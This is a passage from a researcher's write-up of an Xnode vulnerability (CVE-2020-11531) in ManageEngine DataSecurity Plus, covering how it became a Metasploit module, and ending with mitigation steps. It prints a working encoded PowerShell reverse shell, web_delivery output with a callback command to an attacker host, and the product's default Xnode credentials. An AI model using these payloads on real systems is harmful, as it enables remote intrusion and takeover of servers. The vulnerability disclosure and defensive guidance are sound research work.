payload = 'powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc "%s"' % (b64encode(r_cmd.encode('utf-8'))).decode('utf-8')

The command itself is a typical PowerShell reverse shell leveraging System.Net.Sockets.TCPClient:

cmd = "$client = New-Object System.Net.Sockets.TCPClient('"+lhost+"',"+str(lport)+");$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendb yte.Length);$stream.Flush()};$client.Close()"

That’s neat and all, but in order to turn this exploit into a Metasploit module, which was my goal at this point, I needed something native involving at least a minimal degree of randomization rather than a single, hard-coded command.

In several of my previous Metasploit modules, I have overcome similar issues by taking advantage of the Msf::Exploit::CmdStager mixin, which allows for payloads to be delivered in batches. This works by starting a server on the attacker machine and then leveraging a command injection vector to trigger callbacks to the server in order to download the final payload. This approach may involve the command injection vector being exploited multiple times in quick succession, which is usually fine. Except this time I didn’t have a simple command injection vector. When I nevertheless tried this approach, it ended up just creating a ton of JSP files on the target (because each dr:/dr_schema_sync request writes a file to disk), before ultimately presenting me with that one line of msfconsole output that haunts the dreams of pentesters and security researchers alike:

[*] Exploit completed, but no session was created.

It was clear I had to come up with something else.

2.6 When in doubt, steal code

I knew that what I needed was basically a simple one-liner that could get me a shell, ideally of the Meterpreter variety, in one go. I reflected on this quite a bit, and ultimately had my “Eureka!” moment when I remembered msf's web_delivery module. This module can be found at exploit/multi/script/web_delivery in msfconsole, and provides exactly the functionality I needed, because it allows you to get a fully functional msf session (Meterpreter or otherwise) by executing a single command on a target. If you run it with the PSH target for Windows, you will get something like this:

msf6 exploit(multi/script/web_delivery) > run -j
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.128:443
[*] Using URL: http://192.168.1.128:8080/qYsJe4qUvvEXgI
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUA
[snipped]

All you need to do to get a Meterpreter session out of this, is paste the printed command (this is actually very long, so I snipped it) into Command Prompt or an injection vector.

Since I could not think of an easy way to leverage this functionality from within another module, I fully gave in to the first instinct of any developer who's in a pickle: steal code. That's right, I simply began copying over code from web_delivery into my draft module until it seemed like it should work together with my own spaghetti. At first it didn't work of course, it never does, but after scrutinizing every relevant line in web_delivery to make sure I didn't miss anything, I got my Frankenstein module to pop its first Meterpreter session via CVE-2020-11531.

In order to make my module reusable, there was one more issue to deal with. As mentioned above, the exploit will wipe the schema directory. As it turns out, Xnode doesn’t really appreciate having no data repository schema files to reference (who would’ve thought?). In fact, the exploit will break Xnode and even make it impossible to reboot DataSecurity Plus. To prevent this from happening in my module, I added a method that leverages the incoming shell (if we got one) to automatically repopulate the schema directory with the default JSON files. This should prevent nuking DataSecurity Plus when exploitation is successful, although it may still impact functionality in the case of a non-default Xnode configuration. But, you may ask, what if the module succeeds in sending a dr:/dr_schema_sync request, yet fails to ultimately get a shell? I don’t know kid, maybe send flowers to the sysadmin?

2.7 Web_delivery as a mixin?

I’m sure the Metasploit devs are going to hate my PR in its current form, with all the web_delivery stuff hardcoded in it, but I hope they will let me move some of the web_delivery code into a mixin so that it can be leveraged by multiple modules without resulting in duplicate code. In any case, the below video shows my hack job module laying waste to one of my test VMs.

2.8 Video || GTFO

2.9 A note on CVE-2020-11531 and ADAudit Plus

While the web server configuration for DataSecurity Plus instances vulnerable to CVE-2020-11531 allows JSP files, this is not true for ADAudit Plus. As a result, directory traversal and arbitrary file write via dr:/dr_schema_sync are still possible in ADAudit Plus, but actually getting a shell requires a different approach from the one pursued for DataSecurity Plus. I haven't really looked into this, but you, dear reader, are more than welcome to have a go.

Mitigation

The most effective way to mitigate these issues is to update your Xnode instances to the latest versions using the available service packs for ADAudit Plus and DataSecurity Plus.

If patching is not feasible for your organization for whatever reason, you can make the following changes to the Xnode configuration file at

<install_dir>\apps\dataengine-xnode\conf\dataengine-xnode.conf

as a workaround:

  • Change the Xnode credentials by editing the value for
xnode.connector.password = chegan

and (optional):

xnode.connector.username = atom
  • Disable remote processing for Xnode (later versions do this by default) by adding the following line:
xnode.connector.accept_remote_request = false

To verify that the patch or workaround was effective, use netcat or a similar tool to connect to Xnode and send an empty JSON hash ({}) like this:

# nc 192.168.1.6 29118
{}

The Xnode server should now respond with the following message:

{"response":{"error_msg":"Remote request-processing disabled!!","error_code":1},"request_id":-1}

Enabling remote processing for research

If you want to test my enumeration module against a free trial version of ADAudit Plus or DataSecurity Plus, you can manually enable remote processing by doing the opposite of step 2 of the workaround described above. So you would need to add the following line to your Xnode configuration file:

xnode.connector.accept_remote_request = true

You will not be able to change the password back to the default, because patched apps will generate a random password for Xnode each time it boots up. However, you can simply provide the correct password to the module, as shown in the demo video.
